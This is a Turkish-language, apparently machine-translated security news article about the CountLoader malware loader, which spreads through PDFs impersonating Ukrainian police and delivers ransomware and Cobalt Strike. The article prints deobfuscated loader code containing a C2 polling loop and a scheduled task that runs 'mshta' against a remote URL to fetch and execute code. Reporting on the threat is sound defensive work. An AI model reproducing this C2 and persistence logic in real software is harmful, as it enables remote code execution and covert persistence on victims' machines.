Son aylarda, güvenlik ekipleri, fidye yazılımı yükleri sunmak için silahlandırılmış PDF dosyalarından yararlanan CountLoader olarak adlandırılan sofistike bir kötü amaçlı yazılım yükleyicisinin ortaya çıktığını gözlemledi.
İlk olarak Ağustos 2025’in sonlarında tespit edilen CountLoader, Rusça konuşan birçok siber suçlu grupla bağlantılıdır ve Lockbit, Blackbasta ve Qilin bağlı kuruluşları da dahil olmak üzere.
Meşru belgeler – genellikle Ukrayna kolluk kuvvetlerini taklit eden – bu yükleyici olarak maskelenerek, bu yükleyici sosyal mühendislikten yararlanır ve PDF, hedef ortamlarda ilk taban elde etmek için zincirlerden yararlanır.
CountLoader’ın dağıtım metodolojisi, JScript (.HTA), .NET ve PowerShell’de yazılmış üç ayrı versiyonda döner.
Her varyant benzersiz özellikler sergiler: JScript sürümü, birden fazla indirme ve yürütme yöntemiyle en kapsamlı işlevselliği sunar, .NET ikili, önceden ayarlanmış bir tarihten sonra sert kodlanmış bir öldürme anahtarı uygular ve PowerShell komut dosyası, yansıtıcı bellek içi yürütme ile kısa bir yükleyici olarak devam eder.
Silent Push analistleri, tüm varyantların kontrol trafiğini gizlemek için XOR ve BASE64 şifreleme rutinlerini kullanan özel bir C2 iletişim protokolü içerdiğini belirtti.
CountLoader’ın etkisi sadece başlangıç erişiminin çok ötesine uzanmaktadır. Başarılı yürütme üzerine, benzersiz bir kurban kimliği oluşturmak için yükleyici parmak izi cihaza özgü detaylar-donanım tanımlayıcıları, etki alanı üyeliği ve antivirüs ürün varlığı gibi-.
Daha sonra, Kobalt Strike Beacons, ADAPTIX İmplantları ve PurEHVNC Backroors gibi ikincil yükleri indirerek kalıcı C2 yoklama döngülerine girer.
Doğu Avrupa’da alan adına birleştirilmiş sistemleri olan kuruluşlar, kurumsal ve devlet kurumlarının stratejik seçimini öneren birincil hedefler olmuştur.
.webp)
CountLoader, Ukrayna Ulusal Polisi’ni taklit eden PDF tabanlı bir kimlik avı cazibesi aracılığıyla özellikle teslim edildi. Kötü niyetli PDF, mShta.exe’yi tetikleyen ve JScript yükleyicisini almak için tetikleyen gömülü bir HTML uygulama nesnesi içeriyordu.
Belgeyi açtıktan sonra, mağdurlar, yükleyici indirme işlemini başlatan gömülü bir bağlantı aracılığıyla “isteğinizi başlatmalarını” talimat veren resmi görünümlü bir bildirimle karşılaştılar.
Enfeksiyon mekanizması
CountLoader’ın enfeksiyon mekanizması, silahlandırılmış PDF’nin sıfır günlük güvenlik açıklarından ziyade kullanıcı etkileşimini kullanma ile başlar.
PDF, tıklandığında Windows MSHTA motorunu çağıran bir HTA nesnesi yerleştirir.
Bu HTA komut dosyası ücretsiz bir JavaScript obfusator kullanılarak gizlenir ve yaklaşık 850 satır kod içerir.
.webp)
Deobfuscation’dan sonra, C2 kontağından sorumlu ana döngü görünür:
for (let i = 1; i <= 10; i++) {
let c2Url = `https://ms-team-ping${i}.com/api/getFile?fn=CheckStatus`;
let response = CheckStatusC2ReturnDecryptedResponse(c2Url, victimFingerprint);
if (response === "success") {
connectAndAuthenticate(c2Url.replace("CheckStatus", "connect"), victimFingerprint);
break;
}
}
// Scheduled task creation for persistence
CreateScheduledTask({
name: "GoogleUpdaterTaskSystem",
command: `mshta https://${envVar}.example.com/start`,
delay: "PT10M"
});Başarılı bir temas üzerine, CountLoader, C2'den elde edilen özel taşıyıcı jetonları ile HTTP post isteklerinden yararlanmak için görevlerden yararlanır.
Bu görevler, yükleyicinin uyarlanabilirliğini ve derin sistem bilgisini gösteren Winhttp, MSXML2, Curl, Bitsadmin veya Cerututil aracılığıyla yürütülebilir dosyaları indirmeyi içerir.
Görevler yürütüldükten sonra, CountLoader sunucuya geri döndüğünü ve sağlam görev yönetimi sağladığını bildirir.
Bu enfeksiyon iş akışı, CountLoader'ın son derece modüler ve kalıcı bir yükleyici olarak tasarımının altını çiziyor, bu da engelleme ve şifreli iletişim yoluyla algılamadan kaçınırken çeşitli fidye yazılımı ve kovma sonrası araçlar sağlayabiliyor.
Bu hikayeyi ilginç bul! Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X'te takip edin.